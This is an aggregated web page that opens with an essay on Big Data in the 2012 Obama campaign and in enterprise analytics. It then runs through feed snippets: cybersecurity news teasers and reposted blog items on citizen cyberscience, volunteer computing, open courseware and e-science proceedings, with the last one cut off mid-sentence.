“Beyond just personal vindication, Silver has proven to the public the power of Big Data in transforming our electoral process. We already rely on statistical models to do everything from flying our airplanes to predicting the weather. This serves as yet another example of computers showing their ability to be better at handling the unknown than loud-talking experts. By winning ‘the nerdiest election in the history of the American Republic,’ Barack Obama has cemented the role of Big Data in every aspect of the campaigning process. His ultimate success came from the work of historic get-out-the-vote efforts dominated by targeted messaging and digital behavioral tracking.” This election has proven that the field of “political data science” is now more than just a concept – it’s a proven, election-winning approach that will continue to revolutionize the way campaigns are run for decades to come. It is common knowledge that the campaign had been heavily leveraging the web platform in very many sophisticated ways. The campaign spectacularly succeeded in integrating political infrastructure with the web infrastructure that they managed to create. A peer-to-peer, bottoms up campaign seemed to be the strategy that finally delivered results. Volunteer participation, feedback synthesis and citizen vote drives were successfully brought out in massive scale hitherto unknown with the web platform. The campaign heavily shaped by the power of social networks and internet energized the youth power in unimaginable ways signifying the triumph of technology power. It’s a treat to watch : Mobile, Social and Big Data coming together and making an impact in this presidential election 2012.

Let’s look at the complexities involved in this exercise : There was a notable shift of demographics in America resulted in the traditional vote bases being less influential (this trend will continue dramatically in the future) – the absolute numbers may not have come down but the proportion in the votable base lowered somewhat –leaving the destiny in the hands of newly emerging swing voter base. Technology played a significant role in doing the rigorous fact checking – imagine during a presidential debate – typical citizens were looking at fact checking analysis in their other screens while watching the debate on the television. Pew research found that many were looking at dual screens while watching the debate. All well, till one looks at the paradox here – as more and more effort is made and money is spent to flood the media with political messages, the impact is significantly less, as people don’t rely on a single news source. Many American homes today are getting to embrace the “four screen” world (TV, laptop, tablet and phone, all use in tandem for everything in our lives) and so the ability to create impact on any promotion is actually becoming tougher and tougher (to create positive impact).

This is observed along with the fact that the U.S is also undergoing a deep structural and institutional change, affecting every walk of the American Life. While the online world is growing, it’s a common citing in the cities and downtowns where one can see established chains closing shops, unable to hold on to competition striking at them from the cyberworld. Trends like this clearly influence the economic role played by different industries, trends in wealth creation, job creation, city growth etc. Younger voters are more clued by default to these changing trends and their impact and so begin to think of their prospects from a different prism compared to older voters, who generally hold conventional views and so this further creates a deeper strata within the society.

Time Magazine has Michael Scherer doing an in-depth assessment on the role big data and data mining played in Obama’s campaign as well. Campaign manager Jim Messina, Scherer writes, “promised a totally different, metric-driven kind of campaign in which politics was the goal but political instincts might not be the means” and employed a massive number of data crunchers to establish an analytics edge to the campaign. The campaign team put together a massive database that pulled information from all areas of the campaign — social media, pollsters, consumer databases, fundraisers, etc. — and merged them into one central location. The current US President’s (Mr.Obama) campaign believed that biggest institutional advantage over its opponent’s campaign was its data and went out of its way to keep the data team away from the glare and made them work in windowless rooms and each of the team members were given codenames. That in and of itself signifies the importance the campaign attached to “Data – Big Data”- that’s!

Scherer adds: “The new megafile didn’t just tell the campaign how to find voters and get their attention; it also allowed the number crunchers to run tests predicting which types of people would be persuaded by certain kinds of appeals.” Scherer’s piece is an astoundingly fascinating look at how data was put to use in a successful presidential campaign. The election results are in a way a big victory for the nerds and big data. Similarly, some time back there was a sensational article on how Target figured a teenage girl was pregnant even before her father could find it. Inside enterprises, there must be big advocates to create frameworks to get to we are big advocates of the “know everything” through the world of data and align the business to succeed.

Large-scale data gathering and analytics are quickly becoming a new frontier of competitive differentiation. While the moves of online business leaders like, Google, and Netflix get noted, many traditional companies are quietly making progress as well. In fact, companies in industries ranging from pharmaceuticals to retailing to telecommunications to insurance have begun moving forward with big data strategies recently. Inside business enterprises, there’s a similar revolution happening – collection of very fine grained data and making them available for analyses in near real time. This helps enterprises learn about the preferences of an individual customer and personalize the offerings for that particular customer /unique customer experience that would make them come back again and again to do more business. Practically speaking, one of the largest transformations that has happened to large enterprises, has involved implementing systems, like ERP, enterprise resource planning; CRM, customer relationship management; or SCM, supply chain management—those large enterprise systems that companies have spent huge swathe of dollars on. These systems typically manage operations extremely well and then set the stage for enterprises to gain business intelligence and learn how they could be managed differently. That’s where Big Data frameworks come in handy and it’s up to business now to seize that opportunity and take advantage of this very fine-grained data that just didn’t exist in similar forms previously. Too few enterprises today fully grasp big data’s potential in their businesses, the data assets and liabilities of those businesses, or the strategic choices they must make to start leveraging big data. By focusing on these issues, enterprises can help their organizations build a data-driven competitive edge, which in this age is clearly a very powerful determinant of success.

           Government Joins the Finance Sector at the Top of the Cyber Attack List    
New research reveals that cyberattacks on the government sector doubled in 2016, hiking to 14% from 7% of all cyber security attacks in 2015. Attacks on the finance sector also rose dramatically from just 3% in 2015 to 14% of all attacks in 2016. The manufacturing sector came in at third place at
           Dimension Data: Mobile Workspaces Are Not Ready for the Cyber Threats of Tomorrow    
Dimension Data, the USD7.5 billion global ICT solutions and services provider, today published a [1] white paper that examines the need for organisations to transform in order to allow employees to work in more mobile workspaces. In fact, enterprises that fail to offer employees a flexible, autonomo
           Dimension Data: Cybercriminals Target the Retail Sector    
New research published today in the NTT 2016 Global Threat Intelligence Report reveals that cybercriminals have shifted their focus from traditional financial markets, to targeting the retail sector. Retail organisations experienced nearly three times as many cyberattacks as those in the finance sec
          It's Not Superman   

This week:

Blood Dragon: Cyber War
Man Of Steel
Star Wars
Captain America 2
Agent Smith

Music for the show provided by Reed Love.

          Analysts think Petya ‘ransomware’ was built for targeted destruction, not profit   
 The description of the Petya infections hitting computers worldwide as “ransomware” may be a misnomer, security analysts suggest. The malicious software’s code and other evidence indicate that the profit motive may have been a camouflage for an act of cyber-espionage targeting Ukraine. Read More

          Citizens vs. geniuses   

Citizens vs. geniuses

It is a characteristic of our culture that we glorify scientific genius. Galileo Galilei, Albert Einstein, Richard Feynman and Stephen Hawking are just a few of the illustrious names from the canon of physics saints. Other disciplines have their own haloed ones. The role of the amateur scientist, in comparison with these greats, seems to vanish into insignificance.

The power of citizen cyberscience
Figuratively, citizen cyberscience today is primarily about harnessing the power of dray horses. Not just a hundred, but - thanks to Web - sometimes a hundred thousand, to tackle a problem that involves a lot of intellectual hauling.

Of course there are many examples of volunteer computing, such as the recently released LHC@Home 2.0 project, but I'm thinking here in particular of that strain of citizen cyberscience, volunteer thinking, represented by projects such as Stardust@Home, GalaxyZoo or FoldIt, where it is human brainpower that is being aggregated, and not just processor power on volunteer PCs.

But citizen cyberscience can be a lot more than this. Because the whole premise that there are only steeds and drays, brilliant professional scientists and ordinary citizens, and a factor of a hundred or more between them in intellectual capacity, is fundamentally flawed.

Fast drays and blinkered steeds
We live in a world where a staggering amount of people have studied science at a very high level, many even obtain a PhD, without becoming professional scientists.

And we live in a world where, due to specialization, professional scientists can only filter a fraction of the information that might be relevant to their research. In other words, a world where many drays can gallop fast, and most steeds are blinkered.

The famous American hat-throwing celebration of graduation. Today, there are many people who are highly educated in science, some may even hold a PhD, without being a scientist or actively engaged in research. Nevertheless, they are specialists who could contribute to their field. Image courtesy Wikimedia.
We can add to that the many steeds that have been put out to pasture - retired scientists with time on their hands and years of experience, who still have much to contribute. And then there are those passionate amateurs who spend all their free time practicing the science they love, the growing ranks of autodidact drays.

The long tail of talent
The whole point of this rather labored equine analogy is just this: the difference between professional scientists and amateurs is blurring.

This is happening for myriad reasons. Thanks to the Internet, but also to radical changes in education opportunities and life expectancies in the developed and much of the developing world.  The net result is that there is not a binary world of geniuses and ordinary mortals, but rather – to use an Internet analogy – a long tail of talent.

This long tail ranges from the many volunteers who can do things such as catalogue galaxy images, the task set by the project GalaxyZoo, to the very few who might be able to spontaneously team up and develop completely new strategies for folding proteins, as scientists behind the computer game FoldIt documented, to their own surprise. (See "Citizen cyberscience: the new age of the amateur" in the CERN Courier for more examples).

The audience joins the show
What will this mean for citizen cyberscience? The most insightful analogy for understanding the implications of this gradual blurring between professional and amateur scientist is not horses, I would argue, but journalists.

The world of journalism has been turned upside-down in recent years by social media technologies which allow a much wider range of people to take part in gathering, filtering and distributing news. Though some professional journalists at first resisted this trend, most now appreciate the likes of Facebook, Twitter and myriad blogs in expanding the sources of news and opinion and accelerating dissemination: the audience has become part of the show.

Could the Internet one day wreak the same sort of social change on the world of science, breaking down the distinction between amateur and professional? In my view, it is not a question of whether, but of when.

A prediction for the future of science
I'm going to venture a guess. By 2020, we will see a significant amount of real, breakthrough science being carried out by online communities - similar to the open source communities that develop complex software packages.

By far the largest fraction of the work will be done by amateurs. Not only that, the amateurs will have the biggest say in exactly what questions are tackled by the community. They will actively help to define the research agenda.

Professional scientists will still play a role, as professional journalists do today, of going into the field - or rather into the lab - in search of new data. This is something that cannot easily be distributed, especially for research that involves expensive experimental equipment.

Scientists will still play a role in vetting results, as journalists and their editors do today, when dealing with information that has been crowdsourced. Scientists will still play a role in shaping the research agenda, much as the benign dictators in open source projects do. But they will have to compromise with the aspirations of the rest of the community in order to get results.

In science as in journalism
That this will happen, I am in little doubt. Even the Royal Society, a pillar of the traditional scientific establishment, has been promoting a major policy discussion on the role of science as a public enterprise, which touches on the issue of citizen participation in science.

How this will impact the scientific establishment in the long run, however, is another question entirely. Judging by the major upheavals that the world of print journalism is going through, I expect the impact to be enormous. And yes, it may not all be nice. A lot of scientists - especially expensive ones in industrialized countries - may find themselves out of work, in the same way that the livelihoods of many journalists have become more precarious in the Web 2.0 era.

I am not saying Galileo's elitist view is wrong - it accurately describes the past. Nor am I suggesting that in future, individual geniuses will become superfluous. Many scientific problems will no doubt remain easier for a gifted individual or a small team of professionals to tackle, in much the same way as there will probably always be problems that supercomputers can better tackle than networks of ordinary computers. Horses for courses.

But in the next 10 years, I contend, the scope for citizen contributions to real science is going to expand radically. And in many cases human genius - embodied in the individual brains of exceptional people such as Galileo - will be supplanted by the genius of interconnected humans. In science as in journalism, the audience will become part of the show.

This opinion is based on a recent entry on François Grey'sblog,

          Citizens are playing an increasing important role in cyber-science   
[Great article in iSGTW about how the Internet and clouds are allowing citizens to play a more direct role in scientific discovery. I believe that we have only scratched the surface on the potential of citizens and students to be more active participants in science. I think this could also be a very “green” approach to science if all the thousands of PCs that are used in such work, were powered solely by small renewable resources using 400 HZ connectivity. For example it would be easy to configure a PC that to be powered by the electrical grid when a user was interacting with the machine – but in sleep mode the computer could be powered by 400 Hz power which could be delivered by roof top solar panel or micro wind mill over existing copper wire in the home. If there was no renewable power available the machine simply shut down and go off line, as there are thousands of other machines elsewhere in the world that could still the processing. This would enable the millions of computers around the world to provided distributing computing capability for all sorts of scientific experiments without increasing the carbon footprint of the machines. -- BSA

Opinion - Scientists, meet the citizens

François Grey is the coordinator of the Citizen Cyberscience Center.

In a week’s time, an unusual meeting of minds will occur in London.
Billed as a Citizen Cyberscience Summit, it will bring together scientists from a range of distributed, volunteer computing and volunteer thinking projects, to mingle with some of the volunteers who participate in these online projects.

The upshot of the event, hosted by King’s College London on 2-3 September, should be a stimulating dialogue about how to make citizen cyberscience even more compelling for the public and even more useful to science.
The timing of the event could not
be better. August saw a bumper crop of major scientific results from online science projects involving public participation. An article in Naturedescribed progress made in protein folding using an online multiplayer game called Foldit. The game allows participants to pull, twist and shake a 3D rendering of a given protein in a variety of ways, just using a mouse and a simple web interface.

Players score according to how energetically stable the resulting protein structure is. Fascinatingly, the scientists discovered that the players spontaneously team up sometimes to try to find new strategies for folding the proteins. This exploration of strategy space, not just the molecular conformation space, puts the human solvers streets ahead of standard computer algorithms, which just plod along with same old strategy.

The Einstein@home screensaver. The Einstein@home project is analysing both gravitational wave detector data and radio astronomy data. Image courtesy Einstein@home

Wave of the future?
This sort of volunteer thinking may well be a wave of the future, but there is still lots of mileage in volunteer computing, which invites participants to simply run scientific software in the background on their PCs or laptop. There are already dozens of such projects online, and one of these, Einstein@home, made waves two weeks ago with a publication in the journal Sciencewhich described the first pulsars to be discovered through public participation.

Over 250,000 volunteers contributed to this research, providing supercomputing-level processing power of 0,25 Petaflops. Over 100 pulsar candidates were discovered, including a highly unusual specimen which is probably the fastest spinning pulsar of its kind, rotating on its axis 41 times a second.
Speakers from research groups behind both Einstein@home and FoldIt are scheduled to speak at the London Summit. And they are also going to listen to a number of the volunteers, and learn about their perspective on participating in such projects.
One celebrated volunteer who will be there, Hanny van Arkel, discovered a mysterious astronomical object in 2007. Since she is Dutch, she referred to it as a “Voorwerp” — Dutch for “object” — when drawing other participants’ attention to it. The name stuck, and as a result, Ms van Arken – —who is a school teacher and also plays guitar in a band — is forever immortalized in the night sky as Hanny’s Voorwerp.
The Summit will feature several such stories of discovery by amateurs, providing a reminder that thanks to the internet, citizens are playing an increasingly direct role in science.
—François Grey for iSGTW

twitter: BillStArnaud
skype: Pocketpro
          Dis-intermediation of the university via open courseware -- NYTimes: An Open Mind   
Dis-intermediation of the university via open courseware -- NYTimes: An Open Mind
[Some excerpts from NYtimes – BSA]

Open courseware is a classic example of disruptive technology, which, loosely defined, is an innovation that comes along one day to change a product or service, often standing an industry on its head. Craigslist did this to newspapers by posting classified ads for free. And the music industry got blindsided when iTunes started unbundling songs from albums and selling them for 99 cents apiece.

Some imagine a situation in which the bulk of introductory course materials are online, as videos or interactive environments; students engage with the material when convenient and show up only for smaller seminars. “In an on-demand environment, they’re thinking,

Mr. Schonfeld sees still more potential in “unbundling” the four elements of educating: design of a course, delivery of that course, delivery of credit and delivery of a degree. “Traditionally, they’ve all lived in the same institutional setting.” Must all four continue to live together, or can one or more be outsourced?

Edupunks — the term for high-tech do-it-yourself educators who skirt traditional structures — are piloting wiki-type U’s that stitch together open course material from many institutions and combine it with student-to-student interaction. In September, Neeru Paharia, a doctoral student at Harvard Business School, and four others from the open education field started up Peer 2 Peer University, a tuition-free, nonprofit experiment financed with seed money from the Hewlett and Shuttleworth foundations.

Ms. Paharia doesn’t speak the same language as traditional educators: P2PU “runs” courses. It doesn’t “offer” them. There are currently 16 courses, in subjects as diverse as behavioral economics, music theory, cyberpunk literature and “managing election campaigns” (and all with a Creative Commons license that grants more freedom of use than a standard copyright). Several hundred people are taking classes, Ms. Paharia says.

P2PU’s mission isn’t to develop a model and stick with it. It is to “experiment and iterate,” says Ms. Paharia, the former executive director of Creative Commons. She likes to talk about signals, a concept borrowed from economics. “Having a degree is a signal,” she says. “It’s a signal to employers that you’ve passed a certain bar.” Here’s the radical part: Ms. Paharia doesn’t think degrees are necessary. P2PU is working to come up with alternative signals that indicate to potential employers that an individual is a good thinker and has the skills he or she claims to have — maybe a written report or an online portfolio.

David Wiley, associate professor of instructional psychology and technology at Brigham Young University, is an adviser to P2PU. For the past several years, he has been referring to “the disaggregation of higher education,” the breaking apart of university functions. Dr. Wiley says that models like P2PU address an important component missing from open courseware: human support. That is, when you have a question, whom can you ask? “No one gets all the way through a textbook without a dozen questions,” he says. “Who’s the T.A.? Where’s your study group?”

“If you go to M.I.T. OpenCourseWare, there’s no way to find out who else is studying the same material and ask them for help,” he says. At P2PU, a “course organizer” leads the discussion but “you are working together with others, so when you have a question you can ask any of your peers. The core idea of P2PU is putting people together around these open courses.”

A similar philosophy is employed by Shai Reshef, the founder of several Internet educational businesses. Mr. Reshef has used $1 million of his own money to start theUniversity of the People, which taps open courses that other universities have put online and relies on student interaction to guide learning; students even grade one another’s papers.

The focus is business administration and computer science, chosen because they hold promise for employment. He says he hopes to seek accreditation, and offer degrees.

Mr. Reshef’s plan is to “take anyone, anyone whatsoever,” as long as they can pass an English orientation course and a course in basic computer skills, and have a high school diploma or equivalent. The nonprofit venture has accepted, and enrolled, 380 of 3,000 applicants, and is trying to raise funds through microphilanthropy — “$80 will send one student to UoPeople for a term” — through social networking.

A decade has passed since M.I.T. decided to give much of its course materials to the public in an act of largesse. The M.I.T. OpenCourseWare Initiative helped usher in the “open educational resources” movement, with its ethos of sharing knowledge via free online educational offerings, including podcasts and videos of lectures, syllabuses and downloadable textbooks. The movement has also helped dislodge higher education from its brick-and-mortar moorings.

If the mission of the university is the creation of knowledge (via research) and the dissemination of knowledge (via teaching and publishing), then it stands to reason that giving that knowledge away fits neatly with that mission. And the branding benefits are clear.
The Open University, the distance-learning behemoth based in England, has vastly increased its visibility with open courses, which frequently show up in the Top 5 downloads on Apple’s iTunes U, a portal to institutions’ free courseware as well as marketing material. The Open University’s free offerings have been downloaded more than 16 million times, with 89 percent of those downloads outside the U.K., says Martin Bean, vice chancellor of the university. Some 6,000 students started out with a free online course before registering for a paid online course.

Carnegie Mellon’s Open Learning Initiative is working with teams of faculty members, researchers on learning and software engineers to develop e-courses designed to improve the educational experience. So far there are 10 complete courses, including logic, statistics, chemistry, biology, economics and French, which cost about $250,000 each to build. Carnegie Mellon is working with community colleges to build four more courses, with the three-year goal of 25 percent more students passing when the class is bolstered by the online instruction.

The intended user is the beginning college student, whom Dr. Smith describes as “someone with limited prior knowledge in a college subject and with little or no experience in successfully directing his or her own learning.”

It works like this: Virtual simulations, labs and tutorials allow for continuous feedback that helps the student along. The student’s progress is tracked step by step, and that information is then used to make improvements to the course. Several studies have shown that students learn a full semester’s worth of material in half the time when the online coursework is added. More students stick with the class, too. “We now have the technology that enables us to go back to what we all know is the best educational experience: personalized, interactive engagement,” Dr. Smith says.

twitter: BillStArnaud
skype: Pocketpro
          International cyber attack due to ‘updated version of known virus’   
Its warning came as an international cyber attack caused disruption for major organisations.
          Human Computing - Distributed Thinking - new age of Citizen Science

By using the strengths of distributed computing technologies, both specialized researchers and citizens have the opportunity to participate in a new way of doing science.

We live in a time when nearly all information is available to nearly all people everywhere.

We are entering an age where all types of people can also contribute to many types of information. A school bus driver in rural Romania may be part of a biomedical research project. Or a banker in Los Angeles might moonlight as a collaborator in an astronomy project – classifying galaxies in her spare time.

This new movement in science, called “citizen science,” allows non-specialist volunteers to participate in global research. The projects are as diverse as backyard insect counts (the Firefly citizen science project), studies of how malaria develops and is transmitted ( or prime numbers searches (through PrimeGrid).

The marriage of distributed computing techniques with citizen science represents a potential revolution. It gives scientists access to more resources and makes “cybercitizens” participants in the research process. With a few mouse clicks and 20 minutes to spare a person can elect to aid scores of projects. They can aid as many or as few projects as they like, and their involvement does not damage the performance of their own computer.

Considering the average desktop is idle about 80% of the time, its spare computing cycles represent a large resource. After downloading the needed software, a computer’s spare analytical power is harvested to work on small pieces of a large problem that has been sent from the project’s server. Once completed, the results are sent back to the project. By sharing out large tasks to many computers a distributed “grid” of computers can reduce the time needed to solve complicated problems.

In the Galaxy Zoo project, everyday citizens can help astronomers do things such as catch exploding stars, or supernovae. Data for the site is provided by an automatic survey in California, at the world-famous Palomar Observatory. Image courtesy Galaxy Zoo Supernovae

Where to start

Many of these projects use the common software platform BOINC (Berkeley Open Infrastructure for Network Computing). The BOINC webpages point to nearly 50 projects, coming many domains including climate change, astrophysics, earthquake monitoring, epidemiology and searches for extraterrestrial life. These count among them Rosetta@home, Climate, Einstein@home, LHC@home, Chess960@home including the well-known SETI@home. BOINC’s volunteers, number about a third of a million people, donate an average of 4,540.83 TeraFLOPS in 24 hours.

Other portals leading to multiple applications include World Community Grid and EDGeS. World Community Grid, sponsored by IBM, with nearly half a million members, collects humanitarian and medical applications such as Nutritious Rice for the World and FightAIDS@home.

The EDGeS project, or Enabling Desktop Grids for e-Science, allows information to pass between desktop grids based on BOINC, and service grids (publicly funded grids of connected computing clusters) such as Enabling Grids for E-sciencE (EGEE.) This makes it possible both for volunteers to contribute to applications on service grids and for researchers to put their service grid applications on volunteer, desktop grid systems.

Human computing – distributed thinking

An intriguing sub-variety of volunteer projects call for “volunteer thinking.” These projects that share out tasks which require human intelligence for accurate processing.

Through Galaxy Zoo, volunteers classify images of the near quarter million galaxies that have been collected through the Sloan Digital Sky Survey. The human brain is able to recognize shape and type much more quickly and accurately than any computer. This work helps astronomers understand how galaxies form.

AfricaMap, a UNOSAT project (the United Nations Institute for Training and Research Operational Satellite Applications Program), will give volunteers satellite images of rural Africa, who will mark roads, bridges, human settlements, rivers, agriculture fields, barren fields and more. This will update old maps and create maps for areas where they did not exist before.

This project, and others like it, are being collected under the umbrella of the Citizen Cyberscience Centre, a partnership of the University of Geneva, the UN Institute for Training and Research and CERN, Europe’s center for physics research, to help regional authorities, humanitarian workers and scientists. Accurate maps will help aid workers reach needy areas and will track the progress of climate change.

Specialized researchers and volunteer citizens can now collaborate on some of the world’s most serious problems. The internet and the Web led to a revolution in the way we access and use information. These tools, coupled with distributing computing technologies, may be ushering in a research revolution as well.

—Danielle Vention, EGEE, is a former iSGTW editor
          Anthony Doesburg: Idle time put to work, all in the cause of science a field referred to as cyberscience, a subset of what has come to be called citizen science. To Bill St Arnaud, head of research at CANARIE, a high-speed network connecting 50,000 Canadian researchers, citizen science is a way of democratising science.

It has echoes of another internet-borne phenomenon, citizen journalism, the idea of members of the public reporting news from their communities without the filters of the corporate media.

Citizen science, however, is not about second-guessing the work of scientists, but can contribute to their efforts by giving them many sets of eyes with which to make observations and measurements, and by lending them computer power.

          Community Remote Sensing and Citizen Science   
[Here is a great concept that integrates citizen science, cyber-infrastructure and web 2.0 tools -- BSA]

Community Remote Sensing

What is Community Remote Sensing?

Remote sensing is the sensing or collection of information ‘from a distance’. Community remote sensing is a new field that combines remote sensing with citizen science, social networks, and crowd-sourcing to enhance the data obtained from traditional sources. It includes the collection, calibration, analysis, communication, or application of remotely sensed information by these community means.

The Earth information needs of our society are vast. Until now, we have relied on government-sponsored satellites and observing systems as the foundation for this information. The rapid emergence of citizen science and social networks introduces an exciting new means for augmenting this knowledge.

The Vision for Community Remote Sensing

Information technologies will provide the foundation for society’s rapid progress in the 21st century. Information about the environment (both natural and human-built) is central to this progress. The enormity of the required undertaking – observing and understanding our world at all space and time scales – takes your breath away.

Accomplishing it will be enabled in part by citizens who contribute to ‘remotely sensed’ versions of the world around them. Governments will depend on such information to understand local details of climate change and respond to natural disasters. The private sector will use it to build online maps and virtual worlds that make commerce more efficient and accessible. Within just a decade or so, the influence of community remote sensing will be as profound for understanding our Earth as the satellite revolution has been over the last five decades.

If you are working in this area, your participation in the Collaboration will benefit both your project and the greater community. Further information, including a detailed description of the Collaboration, can be obtained from the Conference Plenary Chair Bill Gail (, 1.303.513.5474). Limited funding may be available to help support selected projects.

An International Community Remote Sensing Collaboration

The Organizing Committee of the 2010 IEEE International Geoscience and Remote Sensing Symposium (IGARSS) is sponsoring a novel project exploring the emerging field of community remote sensing and invites your participation.

IGARSS 2010 will spotlight this emerging field with a plenary session entirely dedicated to the topic, supporting the conference theme “Remote Sensing: Global Vision for Local Action”. During the year leading up to the plenary, the Organizing Committee is identifying and highlighting existing projects that embody the plenary theme. Participating projects, selected for their promise to create either new knowledge or new technologies associated with community remote sensing, are highlighted here on the website (see links in table below). Progress is being tracked throughout the year, and results will be presented during the IGARSS 2010 plenary session. Plenary speakers will be selected from major organizations that reflect public sector, private sector, academia, and NGO perspectives on community remote sensing.
          CERN launches citzen cyber-infrastructure project

UNITAR, UNIGE and CERN Collaborate on a Citizen Cyberscience Centre

The United Nations Institute for Training and Research, UNITAR, the University of Geneva, UNIGE, and the European Organization for Nuclear Research, CERN (hereafter referred to collectively as "the Partners") have formally agreed to collaborate on a Citizen Cyberscience Centre Project.

Citizen Cyberscience
The Partners have a common interest in, and experience of, developing Citizen Cyberscience applications for humanitarian and fundamental research.

Citizen Cyberscience provides scientists with an inexpensive form of distributed computing power that is complementary to Grid technology. This is especially true for processing-intensive problems, as illustrated by the LHC@home project developed by CERN and partners for Large Hadron Collider beam studies.


The areas of collaboration include:

* use of Citizen Cyberscience to help local authorities and humanitarian workers in developing regions to use earth imagery acquired from space for emergency response and improved territorial planning and management, including disaster risk reduction and adaptation to climate change;
* use of Citizen Cyberscience to help scientists discover new drugs for infectious tropical or neglected diseases using computer-aided screening of potential drug compounds, as well as to predict the impact of using such drugs in large-scale epidemiological simulations.
* use of Citizen Cyberscience to enable scientists in developing countries with limited resources to contribute in meaningful ways to international collaborations in fundamental science, such as particle physics and astrophysics.
          The age of Citizen cyber-infrastructure   
[For more examples of citizen cyber-infrastructure please see Some excerpts from iSGTW--BSA]
Opinion - The age of citizen cyberspace

Using LHC@home, particle beam dynamics can be studied with volunteer computing. Image courtesy CERN
(François Grey, one of the key people behind the founding of the present-day iSGTW and a frequent contributor to these pages, argues that with volunteer computing, we are about to embark upon a new era of “citizen science.”)

….PrimeGrid, is tackling a host of numerical challenges, such as finding the longest arithmetic progression of prime numbers (the current record is 25). Professional mathematicians now eagerly collaborate with Rytis to analyze the gems that his volunteers dig up. Yet he funds his project by selling PrimeGrid mugs and t-shirts. In short, Rytis and his online volunteers are a web-enabled version of a venerable tradition: they are “citizen scientists.”
There are nearly 100 science projects using such volunteer computing. Like PrimeGrid, most are based on an open-source software platform called BOINC (see 15 October 2008 iSGTW, “Reaching for the Exa-scale”) with volunteer computing. Many address topical themes, such as modelling climate change with, developing drugs for AIDS with FightAids@home, or simulating the spread of malaria with (See 7 May 2008 iSGTW, “WISDOM unplugged: Malaria drug-leads graduate to the wet lab”)

Fundamental science projects are also well represented. Einstein@Home (iSGTW 14 May 2008) analyzes data from gravitational wave detectors, MilkyWay@Home simulates galactic evolution, and LHC@home studies accelerator beam dynamics. Each of these projects has easily attracted tens of thousands of volunteers.

A new wave of online science projects, which can be described as “volunteer thinking,” takes the idea of participative science to a higher level. A popular example is the project GalaxyZoo, where volunteers can classify images of galaxies from the Sloan Digital Sky Survey as either elliptical or spiral, via a simple web interface. In a matter of months, some 100,000 volunteers classified more than 1 million galaxies. People do this sort of pattern recognition more accurately than any computer algorithm. And by asking many volunteers to classify the same image, their statistical average proves to be more accurate than even a professional astronomer.

Going one step farther in interactivity, the project Foldit is an online game that scores a player’s ability to fold a protein molecule into a minimal-energy structure. Through a nifty web interface, players can shake, wiggle and stretch different parts of the molecule. Again, people are often much faster at this task than computers, because of their aptitude to reason in three dimensions. And the best protein folders are usually teenage gaming enthusiasts rather than trained biochemists.

Who can benefit from this web-based boom in citizen science? In my view, scientists in the developing world stand to gain most by effectively plugging in to philanthropic resources: the computers and brains of supportive citizens, primarily those in industrialized countries with the necessary equipment and leisure time. A project called Africa@home, which I've been involved in, has trained dozens of African scientists to use BOINC. Some are already developing new volunteer-thinking projects, and the first African BOINC server is running at the University of Cape Town.

A new initiative called Asia@home was launched last month with a workshop at Academia Sinica in Taipei and a seminar at the Institute of High Energy Physics in Beijing, to drum up interest in that region. Asia represents an enormous potential, in terms of both the numbers of people with internet access (more Chinese are now online than Americans) and the high levels of education and interest in science.

To encourage such initiatives further, CERN, the United Nations Institute for Training and Research and the University of Geneva will establish a Citizen Cyberscience Center on 2 July. This will help disseminate volunteer computing in the developing world and encourage new technical approaches. For example, as mobile phones become more powerful they, too, can surely be harnessed.
There are about one billion internet connections on the planet and three billion mobile phones. That represents a huge opportunity for citizen science.
          e-science, virtual organisations, data curation   
[Thanks to Richard Ackerman for this pointer, and I agree with his assessment there are lots of interesting presentations here –BSA]

A lot of interesting presentations here

Proceedings from the ARL/CNI Fall Forum
October 16-17, 2008
Arlington, Virginia

E-Science: Trends, Transformations & Responses
E-Science: Trends, Transformations & Responses
Chris Greer, Director, National Coordination Office (NCO) for the multiagency Federal Networking and Information Technology Research and Development (NITRD) Program
Audio [MP3 22 min.] | Slides [PPS 24.7 MB]
A Case Study in E-Science: Building Ecological Informatics Solutions for Multi-Decadal Research
William Michener, Research Professor (Biology) and Associate Director, Long-Term Ecological Research Network Office, University of New Mexico
Audio [MP3 26 min.] | Slides [PPS 8 MB]
Making a Quantum Leap to eResearch Support
Rick Luce, Vice Provost and Director of University Libraries, Emory University Libraries
Audio [MP3 19 min.] | Slides [PDF 2.5 MB]
Data Curation: Issues and Challenges
Transition or Transform? Repositioning the Library for the Petabyte Era
Liz Lyon, Director, UKOLN
Audio [MP3 23 min.] | Slides [PPS 10.3 MB]
Research and Data
Fran Berman, Director of the San Diego Supercomputer Center, UC San Diego, and Co-chair Blue Ribbon Task Force on Sustainable Digital Preservation and Access
Audio [MP3 44 min.] | Slides [PPS 5.5 MB]
Data Curation Issues and Challenges
Sayeed Choudhury, Associate Dean of University Libraries and Hodson Director of the Digital Research and Curation Center, Johns Hopkins University
Audio [MP3 20 min.] | Slides [PPS 424 KB]
Data Curation Panel
Pam Bjornson, Director-General, Canada Institute for Scientific and Technical Information
Audio [MP3 6 min.] | Slides [PPS 1.9 MB]
Supporting Virtual Organizations
The Coming Age of Virtual Organizations: The Early History and Future of Geographically Distributed Collaboration
Thomas A. Finholt, Director, Collaboratory for Research on Electronic Work (CREW) and Research Professor & Associate Dean for Research and Innovation, School of Information, University of Michigan
Audio [MP3 24 min.] | Slides [PPS 7.3 MB]
Cyberinfrastructure for Discovery, Learning, and Engagement:

The nanoHUB Experience
Mark Lundstrom, Don and Carol Scifres Distinguished Professor, Director, Network for Computational Nanotechnology, School of Electrical and Computer Engineering, Purdue University
Audio [MP3 22 min.] | Slides [PPS 3.5 MB]
Reactor Panel: Supporting the Virtual Organization: A Role for Libraries?
Medha Devare, Life Sciences and Bioinformatics Librarian, Mann Library, Cornell University
Audio [MP3 20 min.] | Slides [PPS 3.2 MB]
Reactor Panel: Supporting the Virtual Organization
D. Scott Brandt, Associate Dean for Research, Purdue University Library
Audio [MP3 7 min.] | Slides [PPS 4.3 MB]
          Impact of Citizen Science on academic research   
[Good article on the impact of citizen science on academic research.
Cyber-infrastructure will not only impact the way we do science at
universities but with the advent of clouds, grids, SOA, remote
instrumentation and Web 2.0 I believe we are entering a new renaissance era
where amateur scientists can have access to the same tools and techniques
used by professional researchers. Of course these same tools also allow us
to move power hungry laboratory and computer equipment off of our campuses
to more environmentally friendly zero carbon renewable energy sites -
accessible to all. From a posting on Dewayne Hendricks list. BSA]


Wired writer Jeff Howe's "Crowdsourcing" thesis is this: the "experts" -
whether they're top-tier physicists or movie-studio heads - don't have a
monopoly on the creation or distribution of information anymore. The crowd,
through technology that's been available for little more than a decade, has
broken that monopoly, transforming everything from entertainment to cancer


Howe introduces this change with an amusing story about birdwatchers. Until
the Internet age, it was the experts who decided whether a bird is extinct
or not - and those experts still think they do. A few years ago, the
